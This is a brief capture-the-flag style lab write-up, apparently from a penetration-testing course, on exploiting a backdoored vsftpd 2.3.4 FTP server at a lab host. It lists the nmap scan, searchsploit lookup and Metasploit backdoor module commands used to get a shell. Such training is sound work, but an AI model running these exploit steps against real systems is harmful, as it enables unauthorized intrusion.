Vulnerable FTP Server
Lab Environment
In this lab environment, you will be provided with GUI access to a Kali machine. The target machine running a vulnerable FTP server will be accessible at demo.ine.local.
Objective: Exploit the server using suitable Metasploit module and get a shell on the target.
Tools
The best tools for this lab are:
Nmap
Metasploit Framework
Writeup
nmap -sSVC demo.ine.local
searchsploit vsftpd 2.3.4
msfconsole
use exploit/unix/ftp/vsftpd_234_backdoor
set rhosts demo.ine.local
run
Last updated